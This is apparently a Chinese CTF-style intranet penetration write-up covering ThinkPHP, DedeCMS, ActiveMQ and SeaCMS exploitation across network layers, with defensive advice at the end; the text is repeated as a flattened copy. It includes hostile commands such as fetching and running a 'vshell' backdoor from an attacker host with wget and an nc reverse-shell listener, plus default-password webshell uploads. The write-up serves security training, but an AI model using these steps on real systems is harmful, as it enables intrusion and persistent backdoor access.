某公司比赛内网渗透测试记录
字数 1996 2025-08-30 06:50:11

内网渗透测试实战教学文档

1. 初始入口点渗透

1.1 ThinkPHP框架漏洞利用

步骤:

  1. 发现目标系统使用ThinkPHP框架
  2. 使用历史漏洞扫描工具对ThinkPHP进行扫描
  3. 确认存在可利用漏洞后直接进行getshell操作

工具推荐:

  • ThinkPHP漏洞扫描工具(如TPscan)
  • AntSword(蚁剑)作为Webshell管理工具

关键点:

  • 熟悉ThinkPHP历史漏洞(如5.x版本的RCE漏洞)
  • 使用蚁剑连接获取的Webshell

1.2 权限维持

  1. 通过蚁剑上传vshell后门
  2. 使用vshell进行系统管理
  3. 在根目录获取第一个flag

2. 第二层内网渗透

2.1 内网信息收集

操作步骤:

  1. 查看网卡信息:ifconfigipconfig
  2. 使用fscan进行内网扫描
  3. 发现内网CMS系统(如dedecms)

关键命令:

ifconfig
fscan -h 目标IP段

2.2 代理隧道建立

步骤:

  1. 使用vshell建立隧道代理
  2. 配置BurpSuite的sock代理
  3. 使用Burp内置浏览器访问内网CMS

配置要点:

  • 确保代理设置正确
  • 通过代理访问内网资源

2.3 DedeCMS漏洞利用

攻击流程:

  1. 尝试默认弱口令(如admin/admin)
  2. 成功登录后台后上传木马
  3. 通过蚁剑走代理连接上传的木马
  4. 上传vshell进行正向连接管理

关键点:

  • 注意内网环境需要正向连接
  • 确保代理通道稳定

3. 第三层内网渗透

3.1 内网扫描与发现

操作:

  1. 收集网卡信息
  2. 发现第二张网卡(如10.10.10.0/24网段)
  3. 使用fscan扫描新发现的网段

3.2 ActiveMQ漏洞利用

攻击步骤:

  1. 发现ActiveMQ服务(10.10.10.70)存在默认密码
  2. 通过已控制的服务器(172.16.200.60)建立隧道代理
  3. 配置BurpSuite访问ActiveMQ管理界面
  4. 搜索并利用ActiveMQ的CVE漏洞

详细过程:

  1. 在已控靶机上搭建HTTP服务: 
    python -m http.server 8080
  2. 下载并执行POC: 
    wget http://172.16.200.60:8080/poc.py
python poc.py
  3. 在10.10.10.60上监听反弹shell: 
    nc -lvp 4444

关键CVE:

  • ActiveMQ反序列化漏洞(如CVE-2016-3088)

4. 第四层内网渗透

4.1 权限维持与扩展

操作:

  1. 在反弹的shell中上传vshell正向木马
  2. 通过wget下载并执行: 
    wget http://attacker_ip/vshell -O /tmp/vshell
chmod +x /tmp/vshell
/tmp/vshell
  3. 本地连接正向木马

4.2 深入内网渗透

步骤:

  1. 对新发现的网段进行扫描
  2. 发现新站点并识别指纹(使用无影工具)
  3. 识别为SeaCMS(版本v10.1)

漏洞利用:

  • 利用SeaCMS的CNVD-2020-22721漏洞
  • 参考FreeBuf上的POC:https://www.freebuf.com/vuls/268189.html

5. 工具与技术总结

5.1 主要工具列表

  1. 扫描工具:

    • fscan(内网综合扫描)
    • 无影(指纹识别)

  2. 代理工具:

    • vshell(隧道代理)
    • BurpSuite(sock代理)

  3. 漏洞利用:

    • ThinkPHP历史漏洞利用工具
    • DedeCMS弱口令爆破
    • ActiveMQ CVE利用工具
    • SeaCMS CNVD-2020-22721 POC

  4. Webshell管理:

    • 蚁剑(AntSword)
    • vshell(权限维持)

5.2 关键技术点

  1. 多层代理技术:

    • 通过已控主机建立跳板
    • 多层网络穿透

  2. 横向移动技术:

    • 内网扫描发现新目标
    • 利用服务漏洞跨网段渗透

  3. 权限维持技术:

    • 正向/反向shell
    • Webshell上传与管理

  4. 漏洞利用技术:

    • 框架漏洞利用(ThinkPHP)
    • CMS漏洞利用(DedeCMS, SeaCMS)
    • 中间件漏洞利用(ActiveMQ)

6. 防御建议

  1. 针对ThinkPHP:

    • 及时更新框架版本
    • 禁用危险函数

  2. 针对DedeCMS:

    • 修改默认管理员密码
    • 限制后台访问IP
    • 关闭不必要的上传功能

  3. 针对ActiveMQ:

    • 修改默认凭据
    • 限制管理界面访问
    • 及时修补已知漏洞

  4. 通用防御措施:

    • 网络分段隔离
    • 实施严格的访问控制
    • 定期安全审计
    • 日志监控与分析

7. 附录

7.1 参考资源

  1. ThinkPHP漏洞利用:https://github.com/...
  2. fscan工具:https://github.com/shadow1ng/fscan
  3. ActiveMQ CVE详情:https://nvd.nist.gov/...
  4. SeaCMS POC:https://www.freebuf.com/vuls/268189.html

7.2 常见问题解答

Q:如何判断是否需要正向连接?
A:当目标在内网且无法直接连接时,需要使用正向连接,让目标主动监听端口,攻击者去连接。

Q:多层内网渗透的关键是什么?
A:关键是建立稳定的代理通道,并做好信息收集,逐步扩大控制范围。

Q:如何防止此类渗透?
A:实施网络分段、最小权限原则、及时修补漏洞、加强日志监控和异常行为检测。

内网渗透测试实战教学文档 1. 初始入口点渗透 1.1 ThinkPHP框架漏洞利用 步骤: 发现目标系统使用ThinkPHP框架 使用历史漏洞扫描工具对ThinkPHP进行扫描 确认存在可利用漏洞后直接进行getshell操作 工具推荐: ThinkPHP漏洞扫描工具(如TPscan) AntSword(蚁剑)作为Webshell管理工具 关键点: 熟悉ThinkPHP历史漏洞(如5.x版本的RCE漏洞) 使用蚁剑连接获取的Webshell 1.2 权限维持 通过蚁剑上传vshell后门 使用vshell进行系统管理 在根目录获取第一个flag 2. 第二层内网渗透 2.1 内网信息收集 操作步骤: 查看网卡信息: ifconfig 或 ipconfig 使用fscan进行内网扫描 发现内网CMS系统(如dedecms) 关键命令: 2.2 代理隧道建立 步骤: 使用vshell建立隧道代理 配置BurpSuite的sock代理 使用Burp内置浏览器访问内网CMS 配置要点: 确保代理设置正确 通过代理访问内网资源 2.3 DedeCMS漏洞利用 攻击流程: 尝试默认弱口令(如admin/admin) 成功登录后台后上传木马 通过蚁剑走代理连接上传的木马 上传vshell进行正向连接管理 关键点: 注意内网环境需要正向连接 确保代理通道稳定 3. 第三层内网渗透 3.1 内网扫描与发现 操作: 收集网卡信息 发现第二张网卡(如10.10.10.0/24网段) 使用fscan扫描新发现的网段 3.2 ActiveMQ漏洞利用 攻击步骤: 发现ActiveMQ服务(10.10.10.70)存在默认密码 通过已控制的服务器(172.16.200.60)建立隧道代理 配置BurpSuite访问ActiveMQ管理界面 搜索并利用ActiveMQ的CVE漏洞 详细过程: 在已控靶机上搭建HTTP服务: 下载并执行POC: 在10.10.10.60上监听反弹shell: 关键CVE: ActiveMQ反序列化漏洞(如CVE-2016-3088) 4. 第四层内网渗透 4.1 权限维持与扩展 操作: 在反弹的shell中上传vshell正向木马 通过wget下载并执行: 本地连接正向木马 4.2 深入内网渗透 步骤: 对新发现的网段进行扫描 发现新站点并识别指纹(使用无影工具) 识别为SeaCMS(版本v10.1) 漏洞利用: 利用SeaCMS的CNVD-2020-22721漏洞 参考FreeBuf上的POC:https://www.freebuf.com/vuls/268189.html 5. 工具与技术总结 5.1 主要工具列表 扫描工具: fscan(内网综合扫描) 无影(指纹识别) 代理工具: vshell(隧道代理) BurpSuite(sock代理) 漏洞利用: ThinkPHP历史漏洞利用工具 DedeCMS弱口令爆破 ActiveMQ CVE利用工具 SeaCMS CNVD-2020-22721 POC Webshell管理: 蚁剑(AntSword) vshell(权限维持) 5.2 关键技术点 多层代理技术: 通过已控主机建立跳板 多层网络穿透 横向移动技术: 内网扫描发现新目标 利用服务漏洞跨网段渗透 权限维持技术: 正向/反向shell Webshell上传与管理 漏洞利用技术: 框架漏洞利用(ThinkPHP) CMS漏洞利用(DedeCMS, SeaCMS) 中间件漏洞利用(ActiveMQ) 6. 防御建议 针对ThinkPHP: 及时更新框架版本 禁用危险函数 针对DedeCMS: 修改默认管理员密码 限制后台访问IP 关闭不必要的上传功能 针对ActiveMQ: 修改默认凭据 限制管理界面访问 及时修补已知漏洞 通用防御措施: 网络分段隔离 实施严格的访问控制 定期安全审计 日志监控与分析 7. 附录 7.1 参考资源 ThinkPHP漏洞利用:https://github.com/... fscan工具:https://github.com/shadow1ng/fscan ActiveMQ CVE详情:https://nvd.nist.gov/... SeaCMS POC:https://www.freebuf.com/vuls/268189.html 7.2 常见问题解答 Q:如何判断是否需要正向连接? A:当目标在内网且无法直接连接时,需要使用正向连接,让目标主动监听端口,攻击者去连接。 Q:多层内网渗透的关键是什么? A:关键是建立稳定的代理通道,并做好信息收集,逐步扩大控制范围。 Q:如何防止此类渗透? A:实施网络分段、最小权限原则、及时修补漏洞、加强日志监控和异常行为检测。